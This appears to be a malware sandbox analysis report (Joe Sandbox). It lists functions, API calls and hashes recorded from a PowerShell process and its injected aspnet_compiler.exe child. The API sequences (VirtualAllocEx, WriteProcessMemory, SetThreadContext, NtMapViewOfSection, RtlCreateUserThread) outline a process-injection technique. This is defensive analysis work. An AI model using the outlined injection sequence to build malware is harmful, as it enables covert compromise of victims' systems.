Analysis Process: powershell.exePID: 5568, Parent PID: 6168COMMON

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	71.9%
Total number of Nodes:	32
Total number of Limit Nodes:	2

Executed Functions

Function 02B99E10 Relevance: 6.7, APIs: 4, Instructions: 664
memoryprocessthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 02B9A0CA
VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 02B9A16C

Part of subcall function 02B98974: WriteProcessMemory.KERNELBASE(?,00000000,00000000,183D2514,00000000,?,?,?,00000000,00000000,?,02B9A1CF,?,00000000,?), ref: 02B9AA44

ResumeThread.KERNELBASE(?), ref: 02B9A3EF
CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 02B9A754

Memory Dump Source

Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd

Similarity

API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
String ID:
API String ID: 4270437565-0
Opcode ID: e01baeff6cdbc9ec7b27f57a76ace17d3fefe57a48bbb482be72a08a64bcf79a
Instruction ID: 91a883f4c0d89cc45050f657c9bbd1cee7c0ac405e00fe488181c3d25a5a0b1e
Opcode Fuzzy Hash: e01baeff6cdbc9ec7b27f57a76ace17d3fefe57a48bbb482be72a08a64bcf79a
Instruction Fuzzy Hash: 42429B70A002198FDF24DF69C954B9EBBB2EF84704F2481E9D909AB291DB34DE85CF51

Function 02B998D6 Relevance: 2.8, Strings: 2, Instructions: 288
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 02B99927
$^q, xrefs: 02B9990E

Memory Dump Source

Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: 72c4b394d21104860c97db3125f7326144a697cfe43d2f5c1a326450f0528e3d
Instruction ID: 807553e26fc41e15a7120aa9643c55e06b328501a424d006d702d7399cf159cd
Opcode Fuzzy Hash: 72c4b394d21104860c97db3125f7326144a697cfe43d2f5c1a326450f0528e3d
Instruction Fuzzy Hash: 1FA19274B042188BDB59AB78886477E7BB7FFC5700B05896DD046E7295CE38D803C792

Function 070C15D8 Relevance: 16.8, Strings: 13, Instructions: 508
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 070C171F
4'^q, xrefs: 070C1713
$^q, xrefs: 070C1A45
$^q, xrefs: 070C1A27
4'^q, xrefs: 070C18BB
$^q, xrefs: 070C16EC
$^q, xrefs: 070C1A0B
$^q, xrefs: 070C1696
4'^q, xrefs: 070C18AF
$^q, xrefs: 070C1A33
$^q, xrefs: 070C19EF
$^q, xrefs: 070C16F8
$^q, xrefs: 070C1A51

Memory Dump Source

Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2118039658
Opcode ID: 156e3053c060e311fe53b0978c37d709d02e19b6ac5d11adc4447775a04b04cc
Instruction ID: 496392018d8862bdc25f6bf477f43ebcd7f22eff980f17f0f25d2cec809b671b
Opcode Fuzzy Hash: 156e3053c060e311fe53b0978c37d709d02e19b6ac5d11adc4447775a04b04cc
Instruction Fuzzy Hash: 34F14BF1B0430E9FDB64DB79C80066EBBE6AFC5210F2886AED415CB256DA31C845C7A1

Function 070C2B40 Relevance: 14.3, Strings: 11, Instructions: 592COMMON

Download Yara Rule

Strings

$^q, xrefs: 070C2BF7
4'^q, xrefs: 070C2C1A
4'^q, xrefs: 070C2DDA
$^q, xrefs: 070C2BDB
4'^q, xrefs: 070C2F80
4'^q, xrefs: 070C2C26
$^q, xrefs: 070C2C03
4'^q, xrefs: 070C2DE6
4'^q, xrefs: 070C2F8C
(o^q, xrefs: 070C314E
(o^q, xrefs: 070C315E

Memory Dump Source

Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-1590887
Opcode ID: 84de0eb1ff649cabd48fbcc2d43e284eb432d6f124af17880a48930cad5dd163
Instruction ID: 1e2a30eb44f7320d567a7294ab6e65157c40dc287e5c73c8d91f9f09782031b1
Opcode Fuzzy Hash: 84de0eb1ff649cabd48fbcc2d43e284eb432d6f124af17880a48930cad5dd163
Instruction Fuzzy Hash: 6E1212B1B0020ADFDB54DF68C8547AEBBE6BB85310F14C6BED4158B255DB31C886CB92

Function 070C1FC8 Relevance: 12.8, Strings: 10, Instructions: 344
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 070C2254
$^q, xrefs: 070C2084
4'^q, xrefs: 070C20E2
$^q, xrefs: 070C201F
4'^q, xrefs: 070C20D6
$^q, xrefs: 070C2213
4'^q, xrefs: 070C2260
$^q, xrefs: 070C223B
$^q, xrefs: 070C2078
$^q, xrefs: 070C222F

Memory Dump Source

Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3512890053
Opcode ID: c707ef4fc0f38293987980c938f2331ba8619d041506228dcb6dc58ec3e6c0f1
Instruction ID: 12149db4df5de455ac95f936ecb9d7a3511d007ce11a43936af98853f796775f
Opcode Fuzzy Hash: c707ef4fc0f38293987980c938f2331ba8619d041506228dcb6dc58ec3e6c0f1
Instruction Fuzzy Hash: 3EB138B1B04306DFDB25CB69C81076EBBE6BBC6210F24866FD815CB651DB31C885C7A1

Function 070C01E8 Relevance: 4.1, Strings: 3, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 070C0491
4'^q, xrefs: 070C03AE
4'^q, xrefs: 070C03B8

Memory Dump Source

Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q
API String ID: 0-953868773
Opcode ID: 08195896e71997fedafa5fbd55af896ca99fcaeab07c589c8bdd9e41812c4824
Instruction ID: 80ee58b80f285a75b7875373ab68936671dc24e1272af875133880dbe717647d
Opcode Fuzzy Hash: 08195896e71997fedafa5fbd55af896ca99fcaeab07c589c8bdd9e41812c4824
Instruction Fuzzy Hash: 38B1D1B0B00216CFDB54CB68CC50A6FBBE6ABC5210B24C66ED515CF355DA72CC46CB91

Function 070C15B9 Relevance: 3.9, Strings: 3, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 070C16EC
4'^q, xrefs: 070C1713
$^q, xrefs: 070C1696

Memory Dump Source

Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: 7618314ec0b303e5a6ff7eff921c83b1886b51b3a0e847147366b02ec1fdf6b1
Instruction ID: 2b2874097d5f1df92e66aebc82e0831d64089f5908111e3698e208f942fe81ab
Opcode Fuzzy Hash: 7618314ec0b303e5a6ff7eff921c83b1886b51b3a0e847147366b02ec1fdf6b1
Instruction Fuzzy Hash: 7D31D2F0A0430D9FDB65DB64880176E7BF5AF42250F58836ED414DB2A3DB35C981CB62

Function 070C1FA9 Relevance: 3.8, Strings: 3, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 070C201F
4'^q, xrefs: 070C20D6
$^q, xrefs: 070C2078

Memory Dump Source

Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q
API String ID: 0-2291298209
Opcode ID: 25aa63fd0be9eb2526de4b1eea094162214c31aade23fe1edd338ad6010915a6
Instruction ID: 89cdf4f5452145f103d139e7dffde63bcda8a18187825c76fe3639fdaca5ebe9
Opcode Fuzzy Hash: 25aa63fd0be9eb2526de4b1eea094162214c31aade23fe1edd338ad6010915a6
Instruction Fuzzy Hash: C231DEB090030ADFEB69DF25884466E7BF5BF51210F2986AFDC28CB652C735C885CB61

Function 02B98950 Relevance: 1.7, APIs: 1, Instructions: 156
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 02B9A754

Memory Dump Source

Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 815e52436d77e80cafa74d46d289950768682aa445bd48b86a8368a21da5c8f1
Instruction ID: 29fb7fba00e9612e342346459c407e541cb809e5e3327395ea1a4baa16083793
Opcode Fuzzy Hash: 815e52436d77e80cafa74d46d289950768682aa445bd48b86a8368a21da5c8f1
Instruction Fuzzy Hash: D151F571901219DFDF24CF99C980BDDBBB5AF48304F1484EAE909B7250DB75AA85CF90

Function 02B9A9C0 Relevance: 1.6, APIs: 1, Instructions: 65
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,183D2514,00000000,?,?,?,00000000,00000000,?,02B9A1CF,?,00000000,?), ref: 02B9AA44

Memory Dump Source

Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b1028976b93fc9c01273bf9a5e920d182837bf66bc919f2f7ae938a7027f3735
Instruction ID: 5d7de99de7c924f250aad7825bb18f9ecda661f3d1e4fcd27c8e740dac00f55b
Opcode Fuzzy Hash: b1028976b93fc9c01273bf9a5e920d182837bf66bc919f2f7ae938a7027f3735
Instruction Fuzzy Hash: 9E2104B5901319DFDB10CFAAC985BDEBBF4FB08324F10842AE558A7200D378A545CFA4

Function 02B98974 Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,183D2514,00000000,?,?,?,00000000,00000000,?,02B9A1CF,?,00000000,?), ref: 02B9AA44

Memory Dump Source

Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 156176da1bd90b39c97a2f5449262f5565b6520f053daa16181bc4f7a271c9d6
Instruction ID: d66a8403d12a58f5347cf8a0090add7adb3613b55d6d22f1c32f3678a0377b92
Opcode Fuzzy Hash: 156176da1bd90b39c97a2f5449262f5565b6520f053daa16181bc4f7a271c9d6
Instruction Fuzzy Hash: E721E7B5900319DFDB10CF99C984BDEBBF4FB48324F508469E558A7250D378A944CFA5

Function 02B9A849 Relevance: 1.6, APIs: 1, Instructions: 59
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,02B99F83), ref: 02B9A8BB

Memory Dump Source

Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ae6d810a9375034c2f2b5234a1d898ebbb3821609df7fbdc44d0769363dc1696
Instruction ID: 6f2ba8cbe22e2727c6ef46058d289706a4d868e1ee7263b621c4715a928a6ef8
Opcode Fuzzy Hash: ae6d810a9375034c2f2b5234a1d898ebbb3821609df7fbdc44d0769363dc1696
Instruction Fuzzy Hash: E91123B2D002098FDB10CFAAC985BDEFBF4EB88320F14C069D458A7640D778A546CFA5

Function 02B98980 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,02B99F83), ref: 02B9A8BB

Memory Dump Source

Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a49437258e2563f9d333f5f890b8a51871ba82c33a3e5b36c89873cff06410e8
Instruction ID: 05d25162c62df6d6bcffc8e6114859af08aeab59ddaf1934df0fa2da85dd2b05
Opcode Fuzzy Hash: a49437258e2563f9d333f5f890b8a51871ba82c33a3e5b36c89873cff06410e8
Instruction Fuzzy Hash: 4E1112B2D002098FDB10CFAAC884BDEBBF4EB88324F148069E458A3600D378A545CFA5

Function 02B9895C Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,02B99F83), ref: 02B9A8BB

Memory Dump Source

Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7b53bf7db965bab2709ea2bd583b139fa43c4adfb7fe98c35c3e83b666b88492
Instruction ID: 32aa775e424c466b09eaa1cc9d2da9f6b77b2ce0d25455ba8291b0036b2d9354
Opcode Fuzzy Hash: 7b53bf7db965bab2709ea2bd583b139fa43c4adfb7fe98c35c3e83b666b88492
Instruction Fuzzy Hash: 811112B2D002098FDB10CFAAC884BDEBBF4EB88324F148069E458A7600D378A545CFA5

Function 070C0D97 Relevance: 1.4, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tP^q, xrefs: 070C0E96

Memory Dump Source

Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q
API String ID: 0-2862610199
Opcode ID: bb08b8b9f6e56e9539b1fcb7426f58544ae4e0e14f7bb85f8e75489a4448dbd4
Instruction ID: 541539a0b4475ab05e98f833073e4de1e1ba08fddf638819e5a9b15d73c5849c
Opcode Fuzzy Hash: bb08b8b9f6e56e9539b1fcb7426f58544ae4e0e14f7bb85f8e75489a4448dbd4
Instruction Fuzzy Hash: 6741F3B0A0938ADFC712CB64CC14A6ABFF1AF46714F19C59AD4489F296C731DC46C7A1

Function 070C241D Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a85d711f140b46fada6f9b077688fab39399444e0f00cb53b184820194dd67
Instruction ID: ba6885471ac1ceec3d6652e792486c754d1c839bbc2ec8db92e9b64a42393cee
Opcode Fuzzy Hash: 35a85d711f140b46fada6f9b077688fab39399444e0f00cb53b184820194dd67
Instruction Fuzzy Hash: F7518DB4600204DFDB15CB94C890AAEBBF2FF89324F5581A9D5456F391CB72DC85CBA1

Function 070C2438 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36a0b9806243fb55e2b6485ce4705b6de7275330f958a2cfe858efb2a5d45c21
Instruction ID: 9d1476941929848c0ace36a4310ec838d37e2f15c2d876f32ae82112a0635bf5
Opcode Fuzzy Hash: 36a0b9806243fb55e2b6485ce4705b6de7275330f958a2cfe858efb2a5d45c21
Instruction Fuzzy Hash: 02517CB4B00204CFDB14CB98C554BAEBBF2BB88324F5481A8D5456F3A5CB72DC85CBA1

Function 02A8D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2096321098.0000000002A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf83c60e1b5716cb2e92670de3a93556df9722b52beb854412fc96c77b7fc2b7
Instruction ID: 925c0044a69719e64f5dca9518ffa131fe6bffcdcd056555b6d2398548f2af1e
Opcode Fuzzy Hash: cf83c60e1b5716cb2e92670de3a93556df9722b52beb854412fc96c77b7fc2b7
Instruction Fuzzy Hash: D3018C6240D3C09FD7124B258C94762BFB8EF53224F0984CBE8898F1A3C6699C45CB72

Function 02A8D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2096321098.0000000002A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2a8d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce52aeab551bf1b76e8c41a02ca9d64f41a9b6c81998a8a6e86d56ca17311a0
Instruction ID: 1e17304cd657ab002c2bc3444eb9fc7d5cb3d8ea60e2f198237967be5dd5d70d
Opcode Fuzzy Hash: 5ce52aeab551bf1b76e8c41a02ca9d64f41a9b6c81998a8a6e86d56ca17311a0
Instruction Fuzzy Hash: AB01F2310097449AE710AF39CDC4B67BFB8EF41324F08C42AED0A4A286CB799841C6B1

Non-executed Functions

Function 070C0FB0 Relevance: 12.9, Strings: 10, Instructions: 381COMMON

Download Yara Rule

Strings

4'^q, xrefs: 070C12B7
4'^q, xrefs: 070C12C3
tP^q, xrefs: 070C1040
4'^q, xrefs: 070C111D
$^q, xrefs: 070C128D
$^q, xrefs: 070C125F
tP^q, xrefs: 070C104C
4'^q, xrefs: 070C1129
$^q, xrefs: 070C1000
$^q, xrefs: 070C1299

Memory Dump Source

Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
API String ID: 0-788909730
Opcode ID: 8eaa0f5f5482f5c380fa37b08de178ee2ce29281ca996305f4ed7ef5c24838fd
Instruction ID: ef79dc151d05e6ba266fd713d64dc8ff2e11ec2cb718d93a93db4eaeb9e1a01d
Opcode Fuzzy Hash: 8eaa0f5f5482f5c380fa37b08de178ee2ce29281ca996305f4ed7ef5c24838fd
Instruction Fuzzy Hash: 01C136F1A0430DDFDB258B69D84476EBBE6AFC6310F24816EE815CB352DA72C846C791

Function 070C007F Relevance: 5.1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

Strings

4'^q, xrefs: 070C00F7
4'^q, xrefs: 070C00EB
$^q, xrefs: 070C00CA
$^q, xrefs: 070C00D6

Memory Dump Source

Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: bf11918cbb7d1267e4431496d7d031c8c06735dc81d3845b0fc7e6a9b04beb56
Instruction ID: d7157f6c7484404e6324a0331d9bd9fe1f50289afb79bc0d2569df9f1fe47c19
Opcode Fuzzy Hash: bf11918cbb7d1267e4431496d7d031c8c06735dc81d3845b0fc7e6a9b04beb56
Instruction Fuzzy Hash: DF01F76164E3C58FD72B53285C2056A6FB65FC3600B2A46EBD080DF3A7DD594D4AC3A2

Analysis Process: aspnet_compiler.exePID: 3636, Parent PID: 5568COMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	57.1%
Total number of Nodes:	56
Total number of Limit Nodes:	2

Executed Functions

Function 004014D6 Relevance: 10.8, APIs: 7, Instructions: 253
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

Function 004014BF Relevance: 10.7, APIs: 7, Instructions: 204
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

Function 004014E8 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

Function 004014EB Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

Function 00402F5D Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403091
NtTerminateProcess.NTDLL ref: 004030AA

Memory Dump Source

Source File: 0000000D.00000002.2173662025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6

